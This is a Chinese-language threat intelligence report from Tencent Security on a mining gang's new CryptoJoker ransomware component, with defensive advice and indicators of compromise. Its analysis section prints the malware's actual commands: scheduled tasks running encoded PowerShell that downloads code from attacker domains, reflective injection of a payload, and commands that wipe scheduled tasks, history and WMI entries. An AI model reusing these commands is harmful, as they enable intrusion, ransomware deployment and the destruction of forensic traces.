长按二维码关注
腾讯安全威胁情报中心
腾讯安全威胁情报中心发现“匿影”挖矿团伙的攻击活动升级,新增加密勒索组件CryptoJoker,该组织已从之前的挖矿计算转向勒索攻击非法牟利。匿影组织传播的勒索病毒组件在执行过程中采用无文件攻击技术,攻击过程中全程无样本文件落地,且在加密数据完成之后会清理定时任务,令事件溯源十分困难。
匿影组织于2019年3月开始出现,之后多次更新挖矿组件并持续使用永恒之蓝工具扩散传播。因该团伙通过多个功能网盘和图床隐藏自身,故安全研究人员将该家族命名为“匿影”。随着数字加密货币价格的上涨,该组织积极制作传播挖矿木马,同时挖取多种数字加密货币(PASC币、门罗币等)进行非法牟利活动,其挖矿活动对受害企业造成严重生产力损失。
腾讯安全专家在对本次新增的勒索病毒组件分析过程中,发现该组织多次使用拼音首字母缩写,且警告信存在明显语法问题,因此推测该团伙为国内黑产组织。匿影组织本次攻击活动的执行流程如下:
匿影最新变种攻击流程
腾讯安全全系列产品已针对该病毒的最新变化同步最新的响应方案,执行清单如下:
|
应用 场景 |
安全产品 |
解决方案 |
|
威 胁 情 报 |
腾讯T-Sec 威胁情报云查服务 (SaaS) |
1)永恒之蓝下载器木马黑产团伙与勒索组件CryptoJoker相关IOCs已入库。 各类安全产品可通过“威胁情报云查服务”提供的接口提升威胁识别能力。可参考:https://cloud.tencent.com/product/tics |
|
腾讯T-Sec 高级威胁追溯系统 |
1)永恒之蓝下载器木马黑产团伙与勒索组件CryptoJoker相关信息和情报已支持检索。 网管可通过威胁追溯系统,分析日志,进行线索研判、追溯网络入侵源头。T-Sec高级威胁追溯系统的更多信息,可参考:https://cloud.tencent.com/product/atts |
|
|
云原生安全 防护 |
云防火墙 (Cloud Firewall,CFW) |
基于网络流量进行威胁检测与主动拦截,已支持: 1)利用永恒之蓝漏洞MS17-010、SMBGhost漏洞CVE-2020-0796相关联的IOCs已支持识别检测; 2)支持下发访问控制规则封禁目标端口,主动拦截永恒之蓝漏洞MS17-010、SMBGhost漏洞CVE-2020-0796洞相关访问流量。 有关云防火墙的更多信息,可参考: |
|
腾讯T-Sec 主机安全 (Cloud Workload Protection,CWP) |
1)云镜已支持永恒之蓝漏洞MS17-010、SMBGhost漏洞CVE-2020-0796的检测; 2)已支持查杀利用永恒之蓝漏洞MS17-010、SMBGhost漏洞CVE-2020-0796、Redis未授权访问漏洞入侵的挖矿木马、后门程序、勒索组件CryptoJoker。
腾讯主机安全(云镜)提供云上终端的防毒杀毒、防入侵、漏洞管理、基线管理等。关于T-Sec主机安全的更多信息,可参考:https://cloud.tencent.com/product/cwp |
|
|
腾讯T-Sec 网络资产风险监测系统 (腾讯御知) |
1)腾讯御知已支持监测全网资产是否受永恒之蓝漏洞MS17-010、SMBGhost漏洞CVE-2020-0796影响。 2)已集成无损检测POC,企业可以对自身资产进行远程检测。 关于腾讯T-Sec网络资产风险监测系统的更多信息,可参考:https://s.tencent.com/product/narms/index.html |
|
|
腾讯T-Sec 安全运营中心 |
基于客户云端安全数据和腾讯安全大数据的云安全运营平台。已接入腾讯主机安全(云镜)、腾讯御知等产品数据导入,为客户提供漏洞情报、威胁发现、事件处置、基线合规、及泄漏监测、风险可视等能力。 关于腾讯T-Sec安全运营中心的更多信息,可参考:https://s.tencent.com/product/soc/index.html |
|
|
非云企业安全防护 |
腾讯T-Sec 高级威胁检测系统 (腾讯御界) |
基于网络流量进行威胁检测,已支持: 1)利用永恒之蓝漏洞MS17-010、SMBGhost漏洞CVE-2020-0796相关联的IOCs已支持识别检测; 2)对利用永恒之蓝漏洞MS17-010、SMBGhost漏洞CVE-2020-0796协议特征进行识别检测; 关于T-Sec高级威胁检测系统的更多信息,可参考: https://cloud.tencent.com/product/nta |
|
腾讯T-Sec终端安全管理系统(御点) |
1)可查杀永恒之蓝下载器木马团伙入侵释放的后门木马、挖矿木马程序; 2)企业终端管理系统已支持检测黑产利用永恒之蓝漏洞MS17-010、SMBGhost漏洞CVE-2020-0796入侵相关的网络通信。 3)企业终端管理系统已支持检测利用Lnk漏洞CVE-2017-8464、Office漏洞CVE-2017-8570攻击的病毒程序; 腾讯御点提供企业终端的防毒杀毒、防入侵、漏洞管理、基线管理等能力,关于T-Sec终端安全管理系统的更多资料,可参考:https://s.tencent.com/product/yd/index.html |
起始模块
“匿影”最新变种依然沿用NSA武器库中的永恒之蓝漏洞工具对目标发起攻击,攻陷目标后在失陷主机上启动X86/X64.dll的感染流程。首先检测该目标是否已经感染本组织的挖矿木马,如果已感染该团伙的挖矿木马,则不再继续感染勒索。
*powershell脚本解码后:
schtasks /create /ru system /sc MINUTE /mo 20 /tn CSware /tr "powershell.exe -ep bypass -e SQBFAFgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwBzAHQAcgBvAG4AZwBhAHAAdAAuAGcAYQAvAHYAaQBwADIALgB0AHgAdAAnACkAKQA="载荷功能
首先创建名为CSware的计划任务,运行周期为二十分钟运行一次,运行脚本如下:
IEX ((new-object net.webclient).downloadstring('http://strongapt.ga/vip2.txt'))
更换了新域名的同时,沿用了该家族的文件命名习惯(vip*.txt),该文件内容如下:
schtasks /create /ru system /sc MINUTE /mo 10 /tn PCHunterDNSml /tr "powershell.exe -ep bypass -e SQBFAFgAIAAoACgAbgBlAHcALQBvAGIAagBlAGMAdAAgAG4AZQB0AC4AdwBlAGIAYwBsAGkAZQBuAHQAKQAuAGQAbwB3AG4AbABvAGEAZABzAHQAcgBpAG4AZwAoACcAaAB0AHQAcAA6AC8ALwB3AG0AaQAuAHMAdAByAG8AbgBnAGEAcAB0AC4AbQBsACcAKQApAA=="不断跟进,经过多层嵌套解码之后触达两个核心功能模块:勒索功能模块与横向移动模块。
横向移动
启动漏扫进程smbzlib,下载永恒之蓝传播模块yhpc.exe(自解压程序)。横向移动沿用永恒之蓝漏洞利用工具包,只是战术性的更换了文件命名加以区分。
$fileNames = Test-Path C:UsersPublicpcsmbzlib.exe$nic='True'if($fileNames -eq $nic){Start-Process -FilePath C:UsersPublicpcsmbzlib.exe}if($fileNames -ne $nic){(new-object System.Net.WebClient).DownloadFile( 'https://yh.strongapt.ga','C:ProgramDatayhpc.exe')Start-Process -FilePath C:ProgramDatayhpc.exe
勒索模块
勒索脚本分为两部分,第一部分声明反射性注入进程的开源powershell脚本,第二部分为勒索样本本身,并设置迷惑性挖矿参数。
C:WindowsSysWOW64WindowsPowerShellv1.0powershell.exe "IEX (new-object net.webclient).downloadstring('http://api.strongapt.ml/powershell.jpg');Invoke-ReflectivePEInjection -PEUrl http://api.strongapt.ml/555.jpg -ExeArgs '-o xmr.f2pool.com:13531 -u 4XU72EwsukWYtYPqmWNuk5yYb5YzPGmMEfxG4BMMCDYYKSoKmnnQnxMx13oaVetgzZ6rYBsRSqbLZ7PcKaB2NSfQSRdZ9b.mmm -p x -k' -ForceASLR"
勒索样本使用文件嵌套的形式执行加密勒索与清理功能,全程文件不落地。勒索文件本身是一个DLL文件,该DLL下载后直接注入powershell进程启动勒索进程,随后在进程中分配可执行空间拷贝内嵌EXE文件启动文件加密功能。
文件加密沿用经典的AES+RSA模式,加密文件后缀为.devos。勒索信中给出了被攻陷主机个人ID,并自称为CryptoJoker,勒索金额额度为0.1BTC.
清理痕迹
与该组织本次攻击与以往不同的是,该版本的攻击组件不包含挖矿模块,勒索模块在执行完文件加密之后进行了任务清理与机器重新启动。
清除所有定时任务:
chtasks /delete /tn * /fRemove-Item (Get-PSReadlineOption).HistorySavePath
清理WMI任务,疑似目前已知的Mykings僵尸网络使用的WMI任务命名(fuckamm*):
wmic /NAMESPACE:"\rootsubscription" PATH __EventFilter WHERE Name="fuckamm321_filter" DELETEwmic /NAMESPACE:"\rootsubscription" PATH ActiveScriptEventConsumer WHERE Name="fuckamm321_consumer" DELETEwmic /NAMESPACE:"\rootsubscription" PATH __EventFilter WHERE Name="Windows Events Filter" DELETEwmic /NAMESPACE:"\rootsubscription" PATH Act
目前还未在社交媒体平台见到感染CryptoJoker公开求助的情况,且该地址暂无交易发生,因此推测匿影病毒升级该勒索组件的时间不长,目前受害系统还不多。腾讯安全专家提醒用户高度关注,利用永恒之蓝横向传播的勒索病毒可能给企业造成重大损失。
腾讯安全专家建议企业运维人员采取以下措施应对匿影团伙的勒索攻击活动:
1、安装永恒之蓝漏洞补丁,手动下载请访问以下页面:
https://technet.microsoft.com/zh-cn/library/security/ms17-010.aspx
其中WinXP,Windows Server 2003用户请访问:
https://www.catalog.update.microsoft.com/Search.aspx?q=KB4012598
2、尽量关闭不必要的端口,如:445、135,139等,对3389,5900等端口可进行白名单配置,只允许白名单内的IP连接登陆。
3、对没有互联需求的服务器/工作站内部访问设置相应控制,避免可连外网服务器被攻击后作为跳板进一步攻击其他服务器。
4、对重要文件和数据(数据库等数据)进行定期非本地备份。
5、在终端/服务器部署专业安全防护软件,Web服务器可考虑部署在腾讯云等具备专业安全防护能力的云服务。
IOCs
勒索组件MD5:
310d54410eb96954b6bedc482a4b44be
自解压文件MD5:
db7c4d812557f3d954023cd9e240af71
URL:
hxxps://vip.strongapt.ga/btc9.jpg
hxxps://vip.strongapt.ga/yhpc.jpg
hxxp://wmi.strongapt.ml
hxxp://strongapt.ga/vip2.txt
hxxp://api.strongapt.ml/vip.jpg
hxxps://api.strongapt.ml/xxx.jpg
hxxps://api.strongapt.ml/64xxx.jpg
hxxp://api.strongapt.ml/powershell.jpg
hxxp://api.strongapt.ml/555.jpg
Doamin:
vip.strongapt.ga
wmi.strongapt.ml
api.strongapt.ml
比特币账号:
1J9Cmo81828BLBQMd7qNgDUhGit6gbmgS8
邮箱地址:
[email protected]
[email protected]
插播一条招聘广告(长期)
腾讯安全团队招聘公有云安全运营工程师,熟悉网络攻防技术,熟悉主机/终端常见安全问题及处置方法,对主机安全、WAF、防火墙等安全产品原理及防御方法有较深入理解的优先,有意请投递简历到[email protected],腾讯安全团队诚邀你的加盟!
更多岗位,可点击这里查询。
本文始发于微信公众号(腾讯安全威胁情报中心):“匿影”挖矿团伙新增勒索组件CryptoJoker,其横向扩散能力存重创企业网络风险
- 左青龙
- 微信扫一扫
-
- 右白虎
- 微信扫一扫
-
评论